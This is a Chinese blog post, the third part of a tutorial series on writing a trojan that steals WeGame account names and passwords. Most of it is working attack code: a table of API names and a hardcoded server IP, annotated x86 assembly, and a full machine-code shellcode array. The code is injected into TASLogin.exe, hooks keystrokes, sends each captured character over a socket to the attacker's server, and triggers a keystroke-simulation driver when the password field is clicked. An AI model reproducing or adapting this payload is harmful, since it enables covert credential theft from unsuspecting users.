木马盗号《三》

2021-04-02 12:01:21 浏览数 (1)

背景:

上一篇 WeGame盗号木马之旅(二) 我们实现了键盘按键模拟驱动的开发,这篇我们实现下具体注入代码的编写。

目标:

具体的注入代码编写。实现账号获取和密码获取。

实现:

下面放两张图形象的说明我们这篇具体是写什么代码:

上面就是具体的感染过程。这一篇我们写的注入代码就是上面橙色框内的代码,后面我们会写InfectiveVirus.exe的代码,用于实现怎么把这次实现的代码写到目标EXE,并且让他像正常工作一样,但是关键时刻会向服务器发送信息。我们的注入代码可以当作就像是原本就运行在目标EXE里面的代码一样。对于获取账号消息,我们可以直接首先设置一个局部钩子(https://msdn.microsoft.com/zh-cn/library/windows/desktop/ms644990(v=vs.85).aspx)(https://blog.csdn.net/rankun1/article/details/50973190),然后设置回掉函数捕获消息,在捕获消息后开启一个线程用来创建套接字,然后发送消息到服务器。密码端的也差不多,只是在钩子的回掉函数里面多加一个WM_LBUTTONDOWN消息的判断,当单击输入密码框时,我们发送命令给上文写到驱动。让他快速模拟按键产生翻译密码本,这个时间很快,一般用户不会察觉。然后当用户输入密码时,就向捕获账号一样,开启一个线程然后发消息就OK了。

我假装读者已经基本了解了PE结构。那么就会明白,我们需要注入的代码其实就是二进制,而不是我们在VS上面写的代码,也不是汇编。当然汇编和二进制就是一样的,可以直接转换。下面我上一张图帮助大家理解具体细节:

上面我们只是把代码指令(二进制)和一些参数(比如函数调用需要的字符串,函数调用地址等等)注入到目标EXE,并没有修改入口地址。下图是最终版:

这样程序会在正式执行自己的代码前首先运行我们的代码,然后我在jmp 到原来的入口点执行本来程序的代码就OK了 O(∩_∩)O。至于这些代码的注入和入口点的修改会在开发 InfectiveVirus.exe是介绍,这些是他的工作。

在说明一点,开发注入的代码,最好直接用汇编语言写。当然也可以首先用C代码实现,然后参考反汇编后的代码在写汇编(比较适合新手-。-!!)。但是最终需要写成汇编,然后转换成二进制。最后通过一个char数组保存二进制到InfectiveVirus.exe。然后直接memcpy复制二进制到目标EXE即可。如图是我写好的二进制代码char 数组:

其实就是对应的汇编指令的机器码。

还有一点说明-。-。。。。 这个汇编代码的编写不像一般的汇编直接可以调用函数,比如 call printf("我最帅!") 。我们知道call 指令其实把EIP设置为了printf函数的指令第一条地址,即 call printf("我最帅!") 其实会被编译器解释成 call 0X66666666(随便写的一个地址)。这个地址一般保存在PE结构的导入表(https://baijiahao.baidu.com/s?id=1590821448124371294&wfr=spider&for=pc)中。简单点讲,导入表保存了这个程序需要使用的所有API 入口地址。但是我们的代码是后期注入的,不可能直接 call printf("我最帅!") -。-///。所以我们需要获得我们注入代码需要使用的函数地址,我把这些地址保存在注入代码的数据区(参见上面某图)。然后直接call 0X66666666(随便写) 来调用printf 这个函数。同时一些需要的参数比如 "我最帅"(举个例子)我也保存到注入代码的参数区。但是我们怎么获取我们需要的函数地址呢?我们可以首先获得LoadLibraryA和GetProcAddress(https://blog.csdn.net/aidem_brown/article/details/50625482)这两个函数地址,然后就可以获取任何模块导出表(https://blog.csdn.net/evi10r/article/details/7216467)中函数的地址了。那么我们怎么获得这两个函数地址呢?上面两个函数在kernel32.dll里面,一般程序都会加载这个DLL。我们可以这么做:

一、获得kernel32.dll加载基质。

二、解析kernel32.dll导出表

(细节请参考《计算机病毒揭秘与对抗》和https://blog.csdn.net/mynote/article/details/387221?locationNum=10)

然后我们就可以在汇编里面通过这两个函数获取我们需要使用函数的地址了。

最后说下参数的问题,函数调用需要的参数我们也需要写到目标EXE里面,因为比如当调用 call printf("我最帅!")时。push "我最帅" 其实是push 0X88888888("我最帅"字符串的入口地址) 所有我们需要准确的计算每一个字符串的地址,正常程序中这种苦活都是编译器连接器完成的,但是我们是"外来户",就没有这个福利了O(∩_∩)O//// 下面提一下两个注入代码的指令区和参数区的入口地址:

tgp_daemon.exe注入代码指令入口地址:0x00570000

tgp_daemon.exe注入代码参数入口地址:0x00571000

TASLogin.exe注入代码指令入口地址:0x004F0000

TASLogin.exe注入代码参数入口地址:0x004F1000

因为我开辟的空间大小是0X2000。所以开头0X1000写指令,后面0X1000放参数。下面看下这两个EXE的PE结构大家就会明白了。 tgp_daemon.exe PE结构图:

ImageBase是加载基址,SizeOfImage是整个PE文件内存大小。相加就是0X00570000,我的数据是加到原来EXE尾部的。下面的TASLogin.exe 也是同理。 TASLogin.exe PE结构图:

下面是我们需要的参数,注释是他们的相对地址: 代码顺序一排一序。

代码语言:javascript复制
1char cBuffer[48] = { 0 };//0
2char* pUser32 = "C:\Windows\System32\user32.dll";//30
char* pWS2_32 = "C:\Windows\System32\Ws2_32.dll";//60
char* pLoadLibrary = "LoadLibraryA";//90
char* pGetProcAddress = "GetProcAddress";//C0
char* pGetCurrentThreadId = "GetCurrentThreadId";//F0
char* pSetWindowsHookEx = "SetWindowsHookExA";//120
char* pCreateThread = "CreateThread";//150
char* pCallNextHookEx = "CallNextHookEx";//180
char* pWSAStartup = "WSAStartup";//1B0
char* psocket = "socket";//1E0
char* phtons = "htons";//210
char* pIP = "192.168.1.3";//240
char* pinet_addr = "inet_addr";//270
char* pconnect = "connect";//2A0
char* psend = "send";//2D0
char* pclosesocket = "closesocket";//300
char* pWSACleanup = "WSACleanup";//330
int iNamesNum;//360
HHOOK gHook;//364
PBYTE pKernalBaseMem = NULL;//368
HANDLE hUser32Handle = NULL;//36C
HANDLE hWS2_32Handle = NULL;//370
WORD* pNameOrdinalsTable;//374
DWORD* pAddressOfName;//378
DWORD* pAddressOfFunction;//37C
DWORD dwLoadLibrary = NULL;//380
DWORD dwGetProcAddress = NULL;//384
PROC procGetCurrentThreadId = NULL;//388
PROC procSetWindowsHookEx = NULL;//38C
PROC procCreateThread = NULL;//390
PROC procCallNextHookEx = NULL;//394
PROC procWSAStartup = NULL;//398
PROC procsocket = NULL;//39C
PROC prochtons = NULL;//3A0
PROC procinet_addr = NULL;//3A4
PROC procconnect = NULL;//3A8
PROC procsend = NULL;//3AC
PROC procclosesocket = NULL;//3B0
PROC procWSACleanup = NULL;//3B4
//////////////
WCHAR pLinkName[] = L"\\.\TROJAN_LINK";//3B8
char pCreateFile[] = "CreateFileW";//3E8
char pDeviceIoControl[] = "DeviceIoControl";//418
PROC procCreateFile = NULL;//448
PROC procDeviceIoControl = NULL;//44C
int temp;//450

PROC 保存的是函数地址 char是函数名字,还有一些int用于临时用。 怎么在汇编调用这些参数?下面举个例子:比如我要push pCreateFile ,在tgp_daemon.exe 的注入代码里面我要这么写 push 0X005713E8 (0X00571000 0X3E8)即参数基址加相对偏移。

下面的代码实现获取LoadLibrary和GetProcAddress函数地址并且获取需要函数地址功能,最后设置消息钩子并返回原始入口点。我以后例子只举TASLogin.exe 注入代码的编写,tgp_daemon.exe 的注入代码类似我就不说了。下面代码第一行是第一条指令的地址,也就是说从这个地址开始写机器码的。-。-///

0x004F0000:

代码语言:javascript复制
mov         eax,dword ptr fs:[00000030h];////获得PEB结构
mov         eax,dword ptr [eax 0Ch];// 0x00c获得   Ldr :_PEB_LDR_DATA
mov         eax,dword ptr [eax 0Ch];// 0x00c 获得第一个 InLoadOrderModuleList : _LIST_ENTRY
mov         eax,dword ptr [eax];// 0x000 下一个节点 InLoadOrderLinks : _LIST_ENTRY
mov         eax,dword ptr [eax];// 0x000 下一个节点 InLoadOrderLinks : _LIST_ENTRY 此时获取到KERNEL32.DLL的_LDR_DATA_TABLE_ENTRY结构
mov         eax,dword ptr [eax 18h];// 0x018 获取KERNEL32.DLL的基址 DllBase : Ptr32 Void
mov         dword ptr [0X368  0X004F1000],eax;//pKernalBase
mov         eax,dword ptr [eax 3Ch];// 0x03c e_lfanew 
mov         ebx,dword ptr [0X368  0X004F1000]
add         eax,ebx;//获得PE头 即_IMAGE_NT_HEADERS结构
add         ebx,dword ptr [eax 78h];// 0x018 OptionalHeader  0x060 DataDirectory 0x000 VirtualAddress 获得导出表的虚拟地址
mov         eax,dword ptr [ebx 14h];//获取NumberOfFunction
mov         dword ptr [0X360  0X004F1000],eax;//iNameNUm
mov         ecx,dword ptr [0X368  0X004F1000]
add         ecx,dword ptr [ebx 24h];//获取 pNameOrdinalsTable
mov         dword ptr [0X374  0X004F1000],ecx;//pNameOrdinals
mov         ecx,dword ptr [0X368  0X004F1000]
add         ecx,dword ptr [ebx 20h];//获得 pAddressOfName
mov         dword ptr [0X378  0X004F1000],ecx;//pAddress
mov         ecx,dword ptr [0X368  0X004F1000]
add         ecx,dword ptr [ebx 1Ch];//获得 pAddressOfFunction
mov         dword ptr [0X37C  0X004F1000],ecx;//Function
;//获取LoadLibrary和GetProcAddress函数地址,需要对比名字链里面的函数名字是否符合,然后获得地址
push        esi;//寄存器不够用,先拿这个过来用用,放函数名字字符串的首地址用于遍历
push        edi;//放目标函数名字字符串的首地址用于遍历
mov         edx,0;//初始化总的有名字的导出函数数目
mov         edi,dword ptr [0X378  0X004F1000];//t1
mov         esi,dword ptr [0X368  0X004F1000]
add         esi,dword ptr [edi edx*4];//获得名字字符串地址用于保存
mov         edi, 0X004F1090;//字符串 LoadLibrary
mov         ebx,0;//初始化LoadLibrary字符比较次数
mov         ecx,0;//初始化GetProcAddress字符比较次数
mov         ah,byte ptr [esi ebx];//t2 获取一个字节
mov         al,byte ptr [edi ebx]
cmp         ah,al;//比较这个字节
jne         0x004F00BA;//jump T3
inc         ebx;//指向下一个字符
cmp         ebx,0Dh;//判断是否到了字符串尾
jne         0x004F0087;//jump T2
mov         ecx,dword ptr [0X374  0X004F1000]
movzx       ecx,word ptr [ecx edx*2];//获得函数地址表序号
mov         edi,dword ptr [0X37C  0X004F1000]
mov         edi,dword ptr [edi ecx*4];//获得LoadLibrary的地址
mov         dword ptr [0X380  0X004F1000],edi;//保存结果
mov         ecx,0;//初始化GetProcAddress字符比较次数
mov         edi, 0X004F10C0 ;//字符串 t3 GetProcAddress
mov         ah,byte ptr [esi ecx];//获取一个字节
mov         al,byte ptr [edi ecx]
cmp         ah,al;//比较这个字节
jne         0x004F00ED;//jump T4
inc         ecx;//指向下一个字符
cmp         ecx,0Eh;//判断是否到了字符串尾
jne         0x004F00BA;//jump T3
mov         esi,dword ptr [0X374  0X004F1000]
movzx       esi,word ptr [esi edx*2];//获得函数地址表序号
mov         edi,dword ptr [0X37C  0X004F1000]
mov         edi,dword ptr [edi esi*4];//获得GetProcAddress的地址
mov         dword ptr [0X384  0X004F1000],edi;//保存结果
mov         eax,dword ptr [0X380  0X004F1000];//t4
cmp         eax,0;//判断是否读取到了两个函数的地址
je          0x004F0105;//jump T5 只要有一个没有就继续寻找
mov         eax,dword ptr [0X384  0X004F1000]
cmp         eax,0
je          0x004F0105;//jump T5
jmp         0x004F0112;//jump T6 都读取到就退出
inc         edx;//t5
cmp         edx,dword ptr [0X360  0X004F1000]
jne         0x004F0066;//jump TI
pop         edi;//t6 恢复环境
pop         esi
mov         eax,dword ptr [0X368  0X004F1000];//获取需要函数地址
mov         ebx,dword ptr [0X380  0X004F1000]
add         ebx,eax
mov         dword ptr [0X380  0X004F1000],ebx
mov         ebx,dword ptr [0X384  0X004F1000]
add         ebx,eax
mov         dword ptr [0X384  0X004F1000],ebx
push        0X004F1030;//参数  User32
call        dword ptr [0X380  0X004F1000]
mov         dword ptr [0X36C  0X004F1000],eax
push        0X004F1060;//参数 WS2
call        dword ptr [0X380  0X004F1000]
mov         dword ptr [0X370  0X004F1000],eax
push        0X004F10F0;//参数  GetCurrrentThreadId
push        [0X368 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X388 0X004F1000],eax;//保存
push        0X004F1120;//参数  SetWindowsHookEx
push        [0X36C 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X38C 0X004F1000],eax;//保存
push        0X004F1150;//参数 CreateThread
push        [0X368 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X390 0X004F1000],eax;//保存
push        0X004F1180;//参数 CallNextHookEx
push        [0X36C 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X394 0X004F1000],eax;//保存
push        0X004F11B0;//参数 WSAStartup
push        [0X370 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X398 0X004F1000],eax;//保存
push        0X004F11E0;//参数 socket
push        [0X370 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X39C 0X004F1000],eax;//保存
push        0X004F1210;//参数 htons
push        [0X370 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X3A0 0X004F1000],eax;//保存
push        0X004F1270;//参数 inet_addr
push        [0X370 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X3A4 0X004F1000],eax;//保存
push        0X004F12A0;//参数 connect
push        [0X370 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X3A8 0X004F1000],eax;//保存
push        0X004F12D0;//参数 send
push        [0X370 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X3AC 0X004F1000],eax;//保存
push        0X004F1300;//参数 closesocket
push        [0X370 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X3B0 0X004F1000],eax;//保存
push        0X004F1330;//参数 WSAClenaup
push        [0X370 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X3B4 0X004F1000],eax;//保存
push        0X004F13E8;//参数 CreateFile
push        [0X368 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X448 0X004F1000],eax;//保存
push        0X004F1418;//参数 DeviceIoControl
push        [0X368 0X004F1000]
call        [0X384 0X004F1000]
mov         [0X44C 0X004F1000],eax;//保存
call        dword ptr ds:[0X388 0X004F1000]
push        eax;//获得线程ID压入
push        0x0
push        0x004F0300;//CALLBACK 地址
push        0x3
call        dword ptr ds:[0X38C 0X004F1000];//设置钩子
mov         [0X364 0X004F1000],eax;//保存返回的HOOK
jmp         0x00420148;//跳回原来程序的入口点

下面是钩子回掉函数的汇编主要判断是不是WM_CHAR消息,如果是就开启线程发送消息。还有就是是不是左键按下,如果是就开启线程进行按键模拟获取密码本(tgp_daemon.exe 注入代码不需要这个):

代码语言:javascript复制
0x004F0300:
push        ebp  
mov         ebp,esp  
sub         esp,0C0h  
push        ebx  
push        esi  
push        edi  
lea         edi,[ebp-0C0h]  
mov         ecx,30h  
mov         eax,0CCCCCCCCh  
rep stos    dword ptr es:[edi]  
mov         eax,dword ptr [ebp 0x10];//获得pMsg地址
mov         ebx,dword ptr [eax 4];//获得message
cmp         ebx,102h;//WM_CHAR  是否是字符消息
jne         0x004F0351;//jump T1
mov         al, [eax 0x8];//获得wParam
mov         byte ptr [0X004F1000 0X0],al;//保存数据到缓冲区  
push        0  
push        0  
lea         eax,[0X004F1000 0X0];//获取缓冲区地址  
push        eax  
push        0x004F03C0;//入口线程 这个线程开启套接字,发送数据
push        0  
push        0  
call        dword ptr [0X004F1000 0X390];//CreateThread
mov         eax,dword ptr [ebp 0x10];//获得pMsg地址
mov         ebx,dword ptr [eax 4];//获得message  T1
cmp         ebx,201h;//WM_LBUTTONDOWN 是否左键单击
jnz         0x004F0374;//jump T3
push        0  
push        0    
push        0  
push        0x004F0480;//入口线程 这个线程执行键盘驱动模拟
push        0  
push        0  
call        dword ptr [0X004F1000 0X390];//CreateThread 
push        dword ptr [ebp 0x10]  ;//T3
push        dword ptr [ebp 0xC]  
push        dword ptr [ebp 0x8]  
push        dword ptr [0X004F1000 0x364];//gHook 
call        dword ptr [0X004F1000 0x394];//CallNextHookEx  
pop         edi  
pop         esi  
pop         ebx  
mov         esp,ebp  
pop         ebp  
ret         0Ch

下面是创建套接字和发送消息的汇编:

代码语言:javascript复制
0x004F03C0:
push        ebp  
mov         ebp,esp  
sub         esp,40h  
push        ebx  
push        esi  
push        edi  
lea         eax,[ebp-1D0h]  
push        eax  
push        202h  
call        dword ptr [0X004F1000 0x398];//WSAStartup
push        0  
push        1  
push        2  
call        dword ptr [0X004F1000 0X39C];//socket  
mov         dword ptr [ebp-8],eax;//保存局部socket  
mov         eax,2  
mov         word ptr [ebp-20h],ax  
push        1A0Ah  
call        dword ptr [0X004F1000 0X3A0];//htons  
mov         word ptr [ebp-1Eh],ax  
push        0X004F1240;//IP  
call        dword ptr [0X004F1000 0X3A4];//inet_addr  
mov         dword ptr [ebp-1Ch],eax  
push        10h;//socketAddr大小  
lea         eax,[ebp-20h];//socketAddr地址  
push        eax  
mov         eax,dword ptr [ebp-8]  
push        eax  
call        dword ptr [0X004F1000 0X3A8];//connect  
cmp         eax,0  
jne         0X004F0437;//jump
push        0  
push        1;//发送数据大小 
push        dword ptr [ebp 8];//缓冲区地址  
mov         eax,dword ptr [ebp-8]  
push        eax  
call        dword ptr [0X004F1000 0x3AC];//send  
mov         eax,dword ptr [ebp-8];//t1  
push        eax  
call        dword ptr [0X004F1000 0X3B0];//closesocket  
call        dword ptr [0X004F1000 0X3B4];//WSAClenaup  
pop         edi  
pop         esi  
pop         ebx  
mov         esp,ebp  
pop         ebp  
ret         4

下面是启动驱动模拟按键的汇编(tgp_daemon.exe 的注入代码不需要):

代码语言:javascript复制
0x004F0480:
push        ebp  
mov         ebp,esp  
sub         esp,0C0h  
push        ebx  
push        esi  
push        edi
push        0
push        80h
push        3
push        0
push        3
push        0xC0000000
push        0X004F13B8;//驱动符号名
call        [0X004F1000 0X448];//CreateFile 打开驱动
push        0
push        0x004F1450;//驱动信息返回地址
push        0
push        0
push        0
push        0
push        0
push        eax
call        [0X004F1000 0X44C];//DeviceIoControl 发送命令启动驱动
pop         edi  
pop         esi  
pop         ebx  
mov         esp,ebp  
pop         ebp  
ret         4

写完了上面的汇编还没完,我们还需要把他变成机器码如下:

代码语言:javascript复制
//注入代码(TASLogin.exe)
char shellcode2[] = {
 0x64,0x8B,0x05,0x30,0x00,0x00,0x00,0x8B,0x40,0x0C,0x8B,0x40,0x0C,0x8B,0x00,0x8B,
 0x00,0x8B,0x40,0x18,0x89,0x05,0x68,0x13,0x4F,0x00,0x8B,0x40,0x3C,0x8B,0x1D,0x68,
 0x13,0x4F,0x00,0x03,0xC3,0x03,0x58,0x78,0x8B,0x43,0x14,0x89,0x05,0x60,0x13,0x4F,
 0x00,0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x24,0x89,0x0D,0x74,0x13,0x4F,0x00,
 0x8B,0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x20,0x89,0x0D,0x78,0x13,0x4F,0x00,0x8B,
 0x0D,0x68,0x13,0x4F,0x00,0x03,0x4B,0x1C,0x89,0x0D,0x7C,0x13,0x4F,0x00,0x56,0x57,
 0xC7,0xC2,0x00,0x00,0x00,0x00,0x8B,0x3D,0x78,0x13,0x4F,0x00,0x8B,0x35,0x68,0x13,
 0x4F,0x00,0x03,0x34,0x97,0xC7,0xC7,0x90,0x10,0x4F,0x00,0xC7,0xC3,0x00,0x00,0x00,
 0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0x8A,0x24,0x33,0x8A,0x04,0x3B,0x3A,0xE0,0x75,
 0x29,0x43,0x83,0xFB,0x0D,0x0F,0x85,0xEC,0xFF,0xFF,0xFF,0x8B,0x0D,0x74,0x13,0x4F,
 0x00,0x0F,0xB7,0x0C,0x51,0x8B,0x3D,0x7C,0x13,0x4F,0x00,0x8B,0x3C,0x8F,0x89,0x3D,
 0x80,0x13,0x4F,0x00,0xC7,0xC1,0x00,0x00,0x00,0x00,0xC7,0xC7,0xC0,0x10,0x4F,0x00,
 0x8A,0x24,0x31,0x8A,0x04,0x39,0x3A,0xE0,0x75,0x23,0x41,0x83,0xF9,0x0E,0x0F,0x85,
 0xE6,0xFF,0xFF,0xFF,0x8B,0x35,0x74,0x13,0x4F,0x00,0x0F,0xB7,0x34,0x56,0x8B,0x3D,
 0x7C,0x13,0x4F,0x00,0x8B,0x3C,0xB7,0x89,0x3D,0x84,0x13,0x4F,0x00,0x8B,0x05,0x80,
 0x13,0x4F,0x00,0x83,0xF8,0x00,0x74,0x0D,0x8B,0x05,0x84,0x13,0x4F,0x00,0x83,0xF8,
 0x00,0x74,0x02,0xEB,0x0D,0x42,0x3B,0x15,0x60,0x13,0x4F,0x00,0x0F,0x85,0x54,0xFF,
 0xFF,0xFF,0x5F,0x5E,0x8B,0x05,0x68,0x13,0x4F,0x00,0x8B,0x1D,0x80,0x13,0x4F,0x00,
 0x03,0xD8,0x89,0x1D,0x80,0x13,0x4F,0x00,0x8B,0x1D,0x84,0x13,0x4F,0x00,0x03,0xD8,
 0x89,0x1D,0x84,0x13,0x4F,0x00,0x68,0x30,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,0x4F,
 0x00,0x89,0x05,0x6C,0x13,0x4F,0x00,0x68,0x60,0x10,0x4F,0x00,0xFF,0x15,0x80,0x13,
 0x4F,0x00,0x89,0x05,0x70,0x13,0x4F,0x00,0x68,0xF0,0x10,0x4F,0x00,0xFF,0x35,0x68,
 0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x88,0x13,0x4F,0x00,0x68,
 0x20,0x11,0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,
 0x89,0x05,0x8C,0x13,0x4F,0x00,0x68,0x50,0x11,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,
 0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x90,0x13,0x4F,0x00,0x68,0x80,0x11,
 0x4F,0x00,0xFF,0x35,0x6C,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,
 0x94,0x13,0x4F,0x00,0x68,0xB0,0x11,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,
 0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x98,0x13,0x4F,0x00,0x68,0xE0,0x11,0x4F,0x00,
 0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x9C,0x13,
 0x4F,0x00,0x68,0x10,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,
 0x13,0x4F,0x00,0x89,0x05,0xA0,0x13,0x4F,0x00,0x68,0x70,0x12,0x4F,0x00,0xFF,0x35,
 0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xA4,0x13,0x4F,0x00,
 0x68,0xA0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,
 0x00,0x89,0x05,0xA8,0x13,0x4F,0x00,0x68,0xD0,0x12,0x4F,0x00,0xFF,0x35,0x70,0x13,
 0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xAC,0x13,0x4F,0x00,0x68,0x00,
 0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,
 0x05,0xB0,0x13,0x4F,0x00,0x68,0x30,0x13,0x4F,0x00,0xFF,0x35,0x70,0x13,0x4F,0x00,
 0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0xB4,0x13,0x4F,0x00,0x68,0xE8,0x13,0x4F,
 0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,0x84,0x13,0x4F,0x00,0x89,0x05,0x48,
 0x14,0x4F,0x00,0x68,0x18,0x14,0x4F,0x00,0xFF,0x35,0x68,0x13,0x4F,0x00,0xFF,0x15,
 0x84,0x13,0x4F,0x00,0x89,0x05,0x4C,0x14,0x4F,0x00,0xFF,0x15,0x88,0x13,0x4F,0x00,
 0x50,0x6A,0x00,0x68,0x00,0x03,0x4F,0x00,0x6A,0x03,0xFF,0x15,0x8C,0x13,0x4F,0x00,
 0x89,0x05,0x64,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,
 0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,0x00,0xE9,0x78,0xFE,0xF2,0xFF,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x8D,0xBD,0x40,0xFF,
 0xFF,0xFF,0xC7,0xC1,0x30,0x00,0x00,0x00,0xC7,0xC0,0xCC,0xCC,0xCC,0xCC,0xF3,0xAB,
 0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x02,0x01,0x00,0x00,0x75,0x23,0x8A,0x40,
 0x08,0x88,0x05,0x00,0x10,0x4F,0x00,0x6A,0x00,0x6A,0x00,0x8D,0x05,0x00,0x10,0x4F,
 0x00,0x50,0x68,0xC0,0x03,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,0x90,0x13,0x4F,
 0x00,0x8B,0x45,0x10,0x8B,0x58,0x04,0x81,0xFB,0x01,0x02,0x00,0x00,0x75,0x15,0x6A,
 0x00,0x6A,0x00,0x6A,0x00,0x68,0x80,0x04,0x4F,0x00,0x6A,0x00,0x6A,0x00,0xFF,0x15,
 0x90,0x13,0x4F,0x00,0xFF,0x75,0x10,0xFF,0x75,0x0C,0xFF,0x75,0x08,0xFF,0x35,0x64,
 0x13,0x4F,0x00,0xFF,0x15,0x94,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,
 0x0C,0x00,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x55,0x8B,0xEC,0x83,0xEC,0x40,0x53,0x56,0x57,0x8D,0x85,0x30,0xFE,0xFF,0xFF,0x50,
 0x68,0x02,0x02,0x00,0x00,0xFF,0x15,0x98,0x13,0x4F,0x00,0x6A,0x00,0x6A,0x01,0x6A,
 0x02,0xFF,0x15,0x9C,0x13,0x4F,0x00,0x89,0x45,0xF8,0xC7,0xC0,0x02,0x00,0x00,0x00,
 0x66,0x89,0x45,0xE0,0x68,0x0B,0x1A,0x00,0x00,0xFF,0x15,0xA0,0x13,0x4F,0x00,0x66,
 0x89,0x45,0xE2,0x68,0x40,0x12,0x4F,0x00,0xFF,0x15,0xA4,0x13,0x4F,0x00,0x89,0x45,
 0xE4,0x6A,0x10,0x8D,0x45,0xE0,0x50,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xA8,0x13,0x4F,
 0x00,0x83,0xF8,0x00,0x75,0x11,0x6A,0x00,0x6A,0x01,0xFF,0x75,0x08,0x8B,0x45,0xF8,
 0x50,0xFF,0x15,0xAC,0x13,0x4F,0x00,0x8B,0x45,0xF8,0x50,0xFF,0x15,0xB0,0x13,0x4F,
 0x00,0xFF,0x15,0xB4,0x13,0x4F,0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
 0x55,0x8B,0xEC,0x81,0xEC,0xC0,0x00,0x00,0x00,0x53,0x56,0x57,0x6A,0x00,0x68,0x80,
 0x00,0x00,0x00,0x6A,0x03,0x6A,0x00,0x6A,0x03,0x68,0x00,0x00,0x00,0xC0,0x68,0xB8,
 0x13,0x4F,0x00,0xFF,0x15,0x48,0x14,0x4F,0x00,0x6A,0x00,0x68,0x54,0x14,0x4F,0x00,
 0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x6A,0x00,0x50,0xFF,0x15,0x4C,0x14,0x4F,
 0x00,0x5F,0x5E,0x5B,0x8B,0xE5,0x5D,0xC2,0x04,0x00,0x90,0x90,0x90,0x90,0x90,0x90
};

本篇结语:

别看我现在写起来很轻松,背后说多了都是泪啊-。-、、、。汇编转机器码可以使用OllyDbg里面的一个插件NonaWrite完成。

THE END

0 人点赞